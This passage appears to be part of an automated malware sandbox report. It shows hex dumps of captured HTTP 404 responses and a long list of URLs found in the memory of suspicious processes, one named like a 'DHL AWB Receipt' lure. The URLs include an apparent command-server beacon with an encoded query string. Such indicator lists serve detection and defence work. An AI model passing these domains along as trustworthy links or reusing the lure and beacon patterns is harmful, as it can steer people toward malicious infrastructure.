20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:24:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:24:10 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36

Source: EhStorAuthn.exe, 00000006.00000002.3761155390.00000000058E6000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003306000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://primepath.net/esw3/?Fvy=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5Pb
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1306240025.0000000002933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.1community.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.2023kuanmeiyingzhibo.net/binding
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/qnz1/
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb03
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d8.
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/bl.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/broadcast.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/index.umd.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/js.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/nc.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/pullup.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/realNameAuth.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.accountwise.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.aikea.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.aipazhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.aituzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.americanstar.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.anxiangzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.babygirlnames.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.babyzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.babyzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.beeswaxwraps.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=327371336423
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.brainathlete.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.bubblewash.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chalouzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chaquzhibo.net
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chicka.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.choujiezhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chunlangzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chunyanzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.conceptartist.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.countrychic.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.cryptomastery.net
